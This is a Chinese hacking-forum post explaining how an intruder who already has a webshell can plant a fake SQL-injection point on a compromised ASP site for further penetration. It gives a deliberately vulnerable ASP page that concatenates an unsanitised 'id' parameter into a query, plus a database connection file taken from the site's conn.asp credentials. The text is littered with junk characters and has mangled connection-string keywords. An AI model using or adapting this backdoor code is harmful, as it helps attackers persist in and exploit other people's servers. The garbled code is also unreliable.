自己构造注入点方便入侵

admin

自己构造注入点方便入侵

& f+ c$ u7 Y* b* i2 j今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点，然后方便渗透，找到更多的可利用的信息

* X! V8 |' s  Y这两天一直考试，想了下，就先仍出来，有什么问题可以提出来，我们一起讨论！

( }$ ~: g' j% S0 b8 x; u* H首先你要拿了一个webshell，这样你找到连接数据库的文件，大多都是conn.asp这个文件里面有mssql的用户和

密码，你要找到用户名、密码、数据库所在的IP，然后连接上去，至于连接大家应该都会，找到网站管理员的表

因为我测试的时候是用管理员的表，我朋友说任何表名都可以，只要这个表存在，代码如下：
- l1 [/ E5 B2 L( }
1 C& X4 J8 X- E$ \6 I" G程序代码
<!--#include file="xx.asp"-->
7 Q$ [8 ^6 i: K5 @/ P: m<%
set rs=server.createobject("ADODB.recordset")
4 Q; S1 W, D! u6 ?# i- o! _id = request("id")
( G3 H2 `, u; `% ~8 C/ ?) J: jstrSQL = "select * from admin where id=" & id
% L" m* C9 y' \5 T2 f7 |rs.open strSQL,conn,1,3
rs.close
6 U+ n, P! Q8 U2 ?1 h$ o%>

9 f1 C4 a" m& x" O$ V7 Q4 F把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名，注意必须存在
3 {6 R4 {; T+ u: w- p6 Q# L
% v' g  I, N5 d6 F你可以连接上去看下表名就是了！这里假设的是admin是表名！这个文件名随便保存！

然后就要构造一个连接数据库的文件了，代码如下：
6 v1 l6 `, H0 |$ l程序代码
. Z4 U6 ^: m, {<%        
strSQLServerName = "000.000.000.000"     '服务器名称或地址
strSQLDBUserName = "sqlname"         '数据库帐号
4 v6 G3 w- X3 vstrSQLDBPassword = "sqlpass"         '数据库密码
strSQLDBName = "sqldataname"           '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
1 T  j+ A* l# O2 U, H) WstrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
2 B- q; O% l% ?4 @) y7 I/ X! econn.open strCon
%>
5 P: T: z3 n2 b! y
3 X! U; ^. `, X. H$ U! `* q这里应该都会了，就不罗嗦了，不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话，

2 W% D5 M, v6 G/ B, W0 o; ?; r# g就这样，正常情况下，就OK了，伪造成功……

           如果有什么问题可以提出来大家一起探讨解决。